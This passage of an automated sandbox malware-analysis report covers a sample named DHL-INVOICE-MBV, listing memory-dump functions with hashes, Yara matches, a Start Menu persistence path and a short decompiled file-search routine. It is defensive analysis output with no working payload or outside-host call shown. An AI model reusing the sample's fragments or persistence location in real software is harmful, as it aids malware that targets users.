Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22
API String ID: 542301482-3066316029
Opcode ID: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
Opcode Fuzzy Hash: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0327E7B7 Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

)H!, xrefs: 0327E80E
}, xrefs: 0327E8AA

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: )H!$}
API String ID: 0-1671585246
Opcode ID: 5d3be6b4d99c67fd6665dee60841f3d0bb45733aa3ff91a3a16b0b72fe2f4d07
Instruction ID: c670093f4ab397489779b2a2e1125fb54348be29edb0a5df5d97dbcd6dd8f4b8
Opcode Fuzzy Hash: 5d3be6b4d99c67fd6665dee60841f3d0bb45733aa3ff91a3a16b0b72fe2f4d07
Instruction Fuzzy Hash: 09113B79120346CEDF39CE645DB97EB36527F51390F560259CC2EAB161C73346848A51

Uniqueness

Uniqueness Score: -1.00%

Function 0327E7D2 Relevance: 2.6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

Strings

)H!, xrefs: 0327E80E
}, xrefs: 0327E8AA

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: )H!$}
API String ID: 0-1671585246
Opcode ID: f02c9bd9e2bb9517d9ba012051e9efbbd9d4eef34b125bd9e05514bb857947d7
Instruction ID: f0d22e5577261f348ee2b70d1f6eec148bd3c988d1cd1e65c8a9b27cd2a91002
Opcode Fuzzy Hash: f02c9bd9e2bb9517d9ba012051e9efbbd9d4eef34b125bd9e05514bb857947d7
Instruction Fuzzy Hash: 5C115935420346CEDF39CF248DBA7EA37617F51340F52425ECC2AAB150D33256848A50

Uniqueness

Uniqueness Score: -1.00%

Function 0327E7BE Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

)H!, xrefs: 0327E80E
}, xrefs: 0327E8AA

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: )H!$}
API String ID: 0-1671585246
Opcode ID: 660ec4e6bfe0c036d751d1f5fc1de6b7b487c73971eff84370d68bbb387b5606
Instruction ID: ea50892782e1c52c4265d44368cd34d2eec2a9185fc7592a9932cdce36d4ed95
Opcode Fuzzy Hash: 660ec4e6bfe0c036d751d1f5fc1de6b7b487c73971eff84370d68bbb387b5606
Instruction Fuzzy Hash: 10115739020346CEDF39CE648DAA7EB36527F61390F52029ECC2EAB161C33246C48A10

Uniqueness

Uniqueness Score: -1.00%

Function 0327D70A Relevance: 1.5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: 36094896d0d96c79f62c601e625c2e5e1131cc1615c4d29c0fc9aa71a98bf4c4
Instruction ID: 93d4aab03eb1f26abff24d8b1448f41a939845372cad643a9c0c2128e9104208
Opcode Fuzzy Hash: 36094896d0d96c79f62c601e625c2e5e1131cc1615c4d29c0fc9aa71a98bf4c4
Instruction Fuzzy Hash: 0FA1033160834ACFDF34CE288999BDB37A6FF45310F9A412ACC4E9B645C7755A868B21

Uniqueness

Uniqueness Score: -1.00%

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402868(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C41(2), _t21 - 0x2d4) != 0xffffffff) {
					E004061CB( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E00406284();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402880
0x0040289b
0x004028a6
0x004028a7
0x004029e1
0x00402882
0x00402885
0x00402888
0x0040288b
0x0040288b
0x00402ac8
0x00402ad4

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
Opcode Fuzzy Hash: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

Uniqueness

Uniqueness Score: -1.00%

Function 0327D9AF Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: d6c66bfd8424a7ffc1bf8994238e259f7e3a8f7b11252058aa5724dc2a1d36a1
Instruction ID: f9e46a0b8986976ea8125816e79025fe0e46079c0b2c081b9c1cd0c00f3b5cfc
Opcode Fuzzy Hash: d6c66bfd8424a7ffc1bf8994238e259f7e3a8f7b11252058aa5724dc2a1d36a1
Instruction Fuzzy Hash: BE91057060834ADFDF34CE288D99BDB37A6FF45210F8A412EDC4EAB541C7761A858B21

Uniqueness

Uniqueness Score: -1.00%

Function 0327DAE8 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: cc11ef6b05c568ec894e01bf6f6371b43a6c0fb20cc49a09039f72c88b3e3156
Instruction ID: cad8b4ca1ebb6510f53c6df9557d76c3dbeddd7b59b7069646b452657746b084
Opcode Fuzzy Hash: cc11ef6b05c568ec894e01bf6f6371b43a6c0fb20cc49a09039f72c88b3e3156
Instruction Fuzzy Hash: A091047060834ADFDF34CE288D99BDB37A6FF45210F8A412EDC4EAB541C7761A858A21

Uniqueness

Uniqueness Score: -1.00%

Function 0327D7DA Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: a768e395a6333c92c591f0a9878dd1f20fc2c2cd5abd4a10f94e17f0562a9e27
Instruction ID: 87e7cdf216eefd7f74a0f382e49a130657e0cbbbcaa6ba8ae579cfc710b083cf
Opcode Fuzzy Hash: a768e395a6333c92c591f0a9878dd1f20fc2c2cd5abd4a10f94e17f0562a9e27
Instruction Fuzzy Hash: CA91027060838ADFDF34CE288999BDB37A6FF49210F8A412EDC4E9B541C7751A858A21

Uniqueness

Uniqueness Score: -1.00%

Function 0327DBB9 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: 05a4d511a2cb6a7cdd13f5af60ec3af4b1db396748b6ef8903e9a92f2c4c9306
Instruction ID: 0d736b5e4e14a8ec1444fe59d8e5a30d54460ea06cdae9525019f59b83262935
Opcode Fuzzy Hash: 05a4d511a2cb6a7cdd13f5af60ec3af4b1db396748b6ef8903e9a92f2c4c9306
Instruction Fuzzy Hash: E781027060838ACFDF74CE288999BDB37A6FF49310F9A412EDC4E9B541C7751A858B21

Uniqueness

Uniqueness Score: -1.00%

Function 0327D8DD Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: 3f6a3290d63b43959fec0cd257891837419a50d98a6655244793f6dddb6f5ea3
Instruction ID: b7599ba27bff47fbb40d1c46aa4982e8ebe0c1378ef5e01dab24a6f3cc52f8e6
Opcode Fuzzy Hash: 3f6a3290d63b43959fec0cd257891837419a50d98a6655244793f6dddb6f5ea3
Instruction Fuzzy Hash: 0681147060838ACFDF74CE288D99BDA37A6FF49310F9A412EDC4E9B541C3750A858B21

Uniqueness

Uniqueness Score: -1.00%

Function 0328143E Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

"\Of, xrefs: 032814E9

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: "\Of
API String ID: 0-2649356506
Opcode ID: 71db3fc0bf9be8457190332723d70e12243dd3e5eba08ee780488d0458799555
Instruction ID: 53e13477a9027348e75630d45d4c59ed5bec49b779e057dcbee2246f68723116
Opcode Fuzzy Hash: 71db3fc0bf9be8457190332723d70e12243dd3e5eba08ee780488d0458799555
Instruction Fuzzy Hash: 2C811274206349CFDB30CF24CDA5BD733A6BFA5340F4A81299C4E9B686C3755A8ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 0327E3C8 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

C&3, xrefs: 0327E6F6

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: C&3
API String ID: 0-3760373329
Opcode ID: 7d63366e4923dfd04a75bda005bd727d2d8de69dfbb3738ded25b451479ab1ee
Instruction ID: 991f8ea7a50c2c80032ed998be38c82c029a52c6d084d7f7bb7e3c6dde11dd1e
Opcode Fuzzy Hash: 7d63366e4923dfd04a75bda005bd727d2d8de69dfbb3738ded25b451479ab1ee
Instruction Fuzzy Hash: 2B712F76A1134A9BDF30EF28CD94BDB37B2BF95350F51402ADC88AB254D3314A82C750

Uniqueness

Uniqueness Score: -1.00%

Function 03281439 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

"\Of, xrefs: 032814E9

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: "\Of
API String ID: 0-2649356506
Opcode ID: 7db108b472a8566020958ed724c11b25c72f4b347f6215818617bb60327244e4
Instruction ID: 21be931eff0f1e662752f4f7e31a2071c59751890f42858226f1b7db9db65af2
Opcode Fuzzy Hash: 7db108b472a8566020958ed724c11b25c72f4b347f6215818617bb60327244e4
Instruction Fuzzy Hash: A981F2756163898FDB34DF28C9A47DA33A2FFA9340F49812DCC4A8F285D3745A86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0328149C Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

"\Of, xrefs: 032814E9

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: "\Of
API String ID: 0-2649356506
Opcode ID: a284ad1a575a11f18d50bd1b457017e00b6226033e9e4a3c3bf13afe9aa9dd7a
Instruction ID: 8d2fa7116d37c6e0da5e52a98bbb8e53ff00a41318ebf79025e54c8f01b38d59
Opcode Fuzzy Hash: a284ad1a575a11f18d50bd1b457017e00b6226033e9e4a3c3bf13afe9aa9dd7a
Instruction Fuzzy Hash: A671D2756053898FDB34CF28D9A47DA37A2FFA9340F49812DCC4A8F285D3745A86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0327EFF7 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63221e443e5cc022e0be1cc82068fe1cca39f1bcbfabb097e552b7db9edf9b26
Instruction ID: 598242c7817086c7152fc9216841268f474ea349f240ad88a04713012f1e8f4c
Opcode Fuzzy Hash: 63221e443e5cc022e0be1cc82068fe1cca39f1bcbfabb097e552b7db9edf9b26
Instruction Fuzzy Hash: 3D914531218385DFDB24DE24C9A6BEF77A6FF69340F46441EDCC9AB501C7318A858B12

Uniqueness

Uniqueness Score: -1.00%

Function 0327EF74 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058f27b21331332804a941720200be35e7e4022e147367a2f573b1f633a5536f
Instruction ID: 93e82c679cd988e6ebd41b04570fea1fd64b90c850a8a3bc8e72c95e64284ae5
Opcode Fuzzy Hash: 058f27b21331332804a941720200be35e7e4022e147367a2f573b1f633a5536f
Instruction Fuzzy Hash: 89910331218349EFDB249E24CDA6BEF77A6EF58340F46441DDCCAAB501C7365A848B16

Uniqueness

Uniqueness Score: -1.00%

Function 0327EF5B Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7530aa9643c57a958a94aa0fc1cc32968cce84fcda45f67d18c37f094b9eac8
Instruction ID: 8cb9466a3eead107524a206420e8d37d0a0d0ce2b854627ae63ca2c1e46ec92c
Opcode Fuzzy Hash: c7530aa9643c57a958a94aa0fc1cc32968cce84fcda45f67d18c37f094b9eac8
Instruction Fuzzy Hash: F391F171618385AFDB74DE24C9A57EE77A2FF69380F85441EDCCA9B201D3708A858B06

Uniqueness

Uniqueness Score: -1.00%

Function 0327F065 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00fc1ab224cf91645598e946c0b41b86ffc6c2e041c190d148364968885febf
Instruction ID: bd5cdd21eb2c5a9d16303a2ebfbec27b2612cea058d914ebc30ee328a8db17a3
Opcode Fuzzy Hash: a00fc1ab224cf91645598e946c0b41b86ffc6c2e041c190d148364968885febf
Instruction Fuzzy Hash: FC710531618389EFDB34DE24C9A5BEF77A7AF58340F86441DDC89EB501C7319A858B12

Uniqueness

Uniqueness Score: -1.00%

Function 0328154E Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3269e494fc97f3d839f149a58c03a3bdaff66157b079b7ae70c394bedd6943d
Instruction ID: b9b80a1cc7380071e4b952a2b7b6c29f72c3725a6bd6724caaea382132814770
Opcode Fuzzy Hash: d3269e494fc97f3d839f149a58c03a3bdaff66157b079b7ae70c394bedd6943d
Instruction Fuzzy Hash: FA61D474605349CFDB30CF148D95FC7336ABF95340F4A80299C4EABA85D3365E4ACA21

Uniqueness

Uniqueness Score: -1.00%

Function 0327A19D Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e48353a20d5d5bb75e3dd0334d1d04027e34e56a5360fb4a2abb29f24a32b8a
Instruction ID: 94d22030c268132a9066ca4b67fb63b5fab73c423a682e5c5e8f1950981b02d6
Opcode Fuzzy Hash: 9e48353a20d5d5bb75e3dd0334d1d04027e34e56a5360fb4a2abb29f24a32b8a
Instruction Fuzzy Hash: 27512734514306DFDF288E6848A6FE7329F5F45110B4F416FDC4BA7E92DB3B98898621

Uniqueness

Uniqueness Score: -1.00%

Function 0329165D Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742edd8d4dc54ed487267b79a8ecaa24f0c352b4c26dedbc489d5b94f7100664
Instruction ID: 93707772079344f1f170153a31bf6ae5956c4e05974fa033b9bf512ff2745483
Opcode Fuzzy Hash: 742edd8d4dc54ed487267b79a8ecaa24f0c352b4c26dedbc489d5b94f7100664
Instruction Fuzzy Hash: 3571DB76500315CFDF758E79C9D63CA3BB6EF62360F94429ACC468A659E3314586CB03

Uniqueness

Uniqueness Score: -1.00%

Function 0327F13F Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cdedb73666d9a6731b4e87e30be2f64a6d40298a19a0fc3f16930bef2f7543
Instruction ID: 8bd72267ab49a76fa4b9a6364a2a6edf61afae53d558519406ff89af1f590f05
Opcode Fuzzy Hash: 95cdedb73666d9a6731b4e87e30be2f64a6d40298a19a0fc3f16930bef2f7543
Instruction Fuzzy Hash: 1151B731218349EFDB249E25CCA6FDB77AAAF54340F4B041DDC8AE7941C7365A848B26

Uniqueness

Uniqueness Score: -1.00%

Function 03281AAA Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5996d2d8dc28c92e7a0b14b838d856b7d87d310db21267d6f02efcd95902e03e
Instruction ID: 1dc1053fabc8d75d8861c52ac615901822980b651730bbfc6777995b1463bcbd
Opcode Fuzzy Hash: 5996d2d8dc28c92e7a0b14b838d856b7d87d310db21267d6f02efcd95902e03e
Instruction Fuzzy Hash: B9511271605309DFCB249F24CD16FD733B6AF15350F4B4119DC8AEBA91D33AAE858A20

Uniqueness

Uniqueness Score: -1.00%

Function 0327A206 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 186c86b3e9308220b8fc285570d5aab9f7118b245e98cd11c3082d1891870d12
Instruction ID: a939787b4defb9721b2cf4cac234ca63edc2d890f08a03c230009673c5dec0be
Opcode Fuzzy Hash: 186c86b3e9308220b8fc285570d5aab9f7118b245e98cd11c3082d1891870d12
Instruction Fuzzy Hash: 43516834610307DFEF28CE6888E5BEB36DBAF45620B4A816FDC4787651EB32C8C58611

Uniqueness

Uniqueness Score: -1.00%

Function 0327A2E2 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56bf833d4f692500ac5376d7ea031d4c65a7dac5554d20c33ebc61f092bac2e2
Instruction ID: 0e7f0a8cce7a8838c2d37dd2a7881489c454662b90bfc822ea8af5e82c577cf6
Opcode Fuzzy Hash: 56bf833d4f692500ac5376d7ea031d4c65a7dac5554d20c33ebc61f092bac2e2
Instruction Fuzzy Hash: F55157706243038FEF68DE6885E53F772E2AF95660F59816FDC868B261D73084C5C612

Uniqueness

Uniqueness Score: -1.00%

Function 0327A16D Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d05b05831df1aa9215cf631d13d85914e9936536e8c2e65cbf7ef53f28ee594
Instruction ID: 88a7c008435ed27d0341bfe0c4867d80c239abe5761880410cbaab18b73775dd
Opcode Fuzzy Hash: 2d05b05831df1aa9215cf631d13d85914e9936536e8c2e65cbf7ef53f28ee594
Instruction Fuzzy Hash: B04124746203078FEF28DE6885F43EB36E6AF59664B49816FCC868B255E731C4C5CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0327A29D Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169d560a1dbd85413cf06ce4e2ddb6acd33b32da4997e65c0e9ee8bc62bcae66
Instruction ID: e4cacce6c1f15bc543d598ee3fa92154455a676ae55e2e95dc7762d84dc5fd73
Opcode Fuzzy Hash: 169d560a1dbd85413cf06ce4e2ddb6acd33b32da4997e65c0e9ee8bc62bcae66
Instruction Fuzzy Hash: 62310820514307DFEF28895848F6FE732DF5F45464B4F41AFDC4BA7A92DB2B98888621

Uniqueness

Uniqueness Score: -1.00%

Function 03281F45 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b865b0a0dc2e8847b5131c3407f9be64e4bbf90acdeef7eecbffdc3277e73d0
Instruction ID: c8d7e2973f739bbeb75d4998ddb5f5d2902dd917f98fefae03318cc214a51a23
Opcode Fuzzy Hash: 1b865b0a0dc2e8847b5131c3407f9be64e4bbf90acdeef7eecbffdc3277e73d0
Instruction Fuzzy Hash: 1A511272A15749DFCB34CF29C9E57DBB3A2AF59340F44862ECD4D8B689C3346A808B11

Uniqueness

Uniqueness Score: -1.00%

Function 03281A9B Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b07853d0a1e7c1d73fe5574ff7cff4fd30e4d93abb356e1b49cd203c2d1e3e
Instruction ID: 42af0b7a7fad5139f6f7ab7c703dbacd745de21221eef4ed22bfec7a5cc2049f
Opcode Fuzzy Hash: 63b07853d0a1e7c1d73fe5574ff7cff4fd30e4d93abb356e1b49cd203c2d1e3e
Instruction Fuzzy Hash: A9514471A1134A8FCB249F28C9657D737F2EF65390F864229CC89DB391D3349D82CA45

Uniqueness

Uniqueness Score: -1.00%

Function 03281B84 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05474956425d210ee5ed6a36ca00db599bc27ca3ae0006ea762594143a1e514
Instruction ID: 550b823a136e5dfbb9eb62663a923ea379093c9f21fcfec756d7e0f2ee3d1f78
Opcode Fuzzy Hash: e05474956425d210ee5ed6a36ca00db599bc27ca3ae0006ea762594143a1e514
Instruction Fuzzy Hash: 8E41F371604309EFC7249F248C12FD733FAAF15350F4B0119DC8AEBA91D77AAE898620

Uniqueness

Uniqueness Score: -1.00%

Function 03293471 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

